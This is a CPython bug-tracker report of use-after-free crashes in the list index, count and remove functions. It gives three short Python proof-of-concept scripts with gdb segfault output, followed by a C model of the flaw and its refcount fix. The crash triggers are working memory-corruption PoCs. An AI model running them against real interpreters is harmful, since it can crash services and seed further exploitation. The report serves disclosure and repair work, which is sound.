New submission from LCatro <m4i1f0rt...@sina.cn>:
Code 1 :

static PyObject *
list_index_impl(PyListObject *self, PyObject *value, Py_ssize_t start,
                Py_ssize_t stop)
    // ...
    for (i = start; i < stop && i < Py_SIZE(self); i++) {
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ);   // <= self->ob_item[i] can uaf ..

PoC :

class rewrite_list_eq(list) :
    def __eq__(self,other) :
        str(other)   # <== this will look up the object's tp_repr slot and call it ..
        return NotImplemented

class poc() :
    def __eq__(self,other) :
        list1.clear()
        return NotImplemented

list1 = rewrite_list_eq([ poc() ])   # wrapped in rewrite_list_eq so the reflected __eq__ runs str(other), as in the crash below
list1.index(list1)   # list_index_impl() -> PyObject_RichCompareBool()

Crash Report :

(gdb) run ../py_poc/list_poc_3.py
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_3.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573         if (Py_TYPE(v)->tp_str == NULL)

=====

Code 2 :

static PyObject *
list_count(PyListObject *self, PyObject *value)
{
    Py_ssize_t count = 0;
    Py_ssize_t i;

    for (i = 0; i < Py_SIZE(self); i++) {
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ);   // <=

PoC :

class rewrite_list_eq(list) :
    def __eq__(self,other) :
        str(other)
        return NotImplemented

class poc() :
    def __eq__(self,other) :
        list1.clear()
        return NotImplemented

list1 = rewrite_list_eq([ poc() ])
list1.count(list1)   # list_count() -> PyObject_RichCompareBool()

Crash Report :

(gdb) run ../py_poc/list_poc_4.py
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_4.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573         if (Py_TYPE(v)->tp_str == NULL)

===

Code 3 :

static PyObject *
list_remove(PyListObject *self, PyObject *value)
/*[clinic end generated code: output=f087e1951a5e30d1 input=2dc2ba5bb2fb1f82]*/
{
    Py_ssize_t i;

    for (i = 0; i < Py_SIZE(self); i++) {
        Py_INCREF(self->ob_item[i]);
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ);

PoC :

class rewrite_list_eq(list) :
    def __eq__(self,other) :
        str(other)
        return NotImplemented

class poc() :
    def __eq__(self,other) :
        list1.clear()
        return NotImplemented

list1 = rewrite_list_eq([ poc() ])
list1.remove(list1)   # list_remove() -> PyObject_RichCompareBool()

Crash Report :

(gdb) run ../py_poc/list_poc_5.py
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_5.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573         if (Py_TYPE(v)->tp_str == NULL)

----------
components: Interpreter Core
messages: 355513
nosy: LCatro, serhiy.storchaka
priority: normal
severity: normal
status: open
title: use-after-free in list object function
type: crash
versions: Python 3.8

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue38610>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
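The pattern behind all three reports, as an added example that is not part of the bug report and is not CPython code: a small C model of a refcounted list scan in which the comparison callback empties the list, shown once with the unprotected 3.8.0-style loop and once holding a strong reference across the call. The object table, the `alive` flag, the simulated free and the names (Obj, List, rich_compare_bool, count_naive, count_safe, run_scenario) are this example's own assumptions; freeing only flips a flag so the use-after-free becomes a checkable return value instead of a segfault.

```c
/*
 * Added example, not code from the bug report or from CPython. A small
 * refcounted object table stands in for the CPython heap; "freeing" only
 * clears `alive`, so a use-after-free is observable rather than undefined.
 * All names below are this example's own.
 */
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define MAX_OBJS  4
#define MAX_ITEMS 4

typedef struct {
    int  refcnt;
    bool alive;   /* false once refcnt reached zero: memory "given back" */
    int  value;
} Obj;

typedef struct {
    Obj   *items[MAX_ITEMS];
    size_t size;
} List;

static Obj    heap[MAX_OBJS];
static size_t heap_used;

static Obj *obj_new(int value)
{
    Obj *o = &heap[heap_used++];
    o->refcnt = 1;            /* the caller owns this reference */
    o->alive  = true;
    o->value  = value;
    return o;
}

static void obj_incref(Obj *o) { o->refcnt++; }

static void obj_decref(Obj *o)
{
    if (--o->refcnt == 0)
        o->alive = false;     /* a real allocator would now reuse this memory */
}

/* list.clear(): drop every item reference; the list may hold the last one. */
static void list_clear(List *l)
{
    for (size_t i = 0; i < l->size; i++)
        obj_decref(l->items[i]);
    l->size = 0;
}

/*
 * Model of PyObject_RichCompareBool(item, owner, Py_EQ) for the report's classes.
 * The frame of item.__eq__(owner) holds its own reference to `item`, so
 * poc.__eq__ can clear the list safely; that reference dies when the frame
 * returns. The reflected owner.__eq__(item) then does str(item): the read in
 * the crash report. Returns 0 (NotImplemented both ways, identity fallback).
 */
static int rich_compare_bool(Obj *item, List *owner, int *uaf_seen)
{
    obj_incref(item);         /* frame reference for item.__eq__(owner) */
    list_clear(owner);        /* body of poc.__eq__ */
    obj_decref(item);         /* frame returns; the last reference may be gone */

    if (!item->alive)         /* rewrite_list_eq.__eq__: str(other) on a freed object */
        *uaf_seen = 1;
    return 0;
}

/* Shape of the 3.8.0 loop: re-reading l->size keeps the index in bounds,
 * but nothing keeps the item alive across the callback. */
static int count_naive(List *l, int *uaf_seen)
{
    int count = 0;
    for (size_t i = 0; i < l->size; i++)
        count += rich_compare_bool(l->items[i], l, uaf_seen);
    return count;
}

/* Hardened loop: take a strong reference before calling back into arbitrary
 * code and drop it afterwards, so the item outlives the comparison. */
static int count_safe(List *l, int *uaf_seen)
{
    int count = 0;
    for (size_t i = 0; i < l->size; i++) {
        Obj *item = l->items[i];
        obj_incref(item);
        count += rich_compare_bool(item, l, uaf_seen);
        obj_decref(item);
    }
    return count;
}

/* Build list1 = [poc()] with the list as sole owner, run one scan, and
 * report whether a freed object was touched (1) or not (0). */
static int run_scenario(bool hardened)
{
    memset(heap, 0, sizeof heap);
    heap_used = 0;

    List list1 = { {0}, 0 };
    list1.items[0] = obj_new(42);   /* ownership passes to the list */
    list1.size = 1;

    int uaf_seen = 0;
    if (hardened)
        count_safe(&list1, &uaf_seen);
    else
        count_naive(&list1, &uaf_seen);
    return uaf_seen;
}
```

Calling run_scenario(false) reports a touched freed object and run_scenario(true) does not. The incref/call/decref bracket in count_safe is the check to look for when auditing any C extension loop that calls back into Python while iterating over storage the callback can mutate: the bounds re-check on Py_SIZE(self) in the original loops protects the index, not the item.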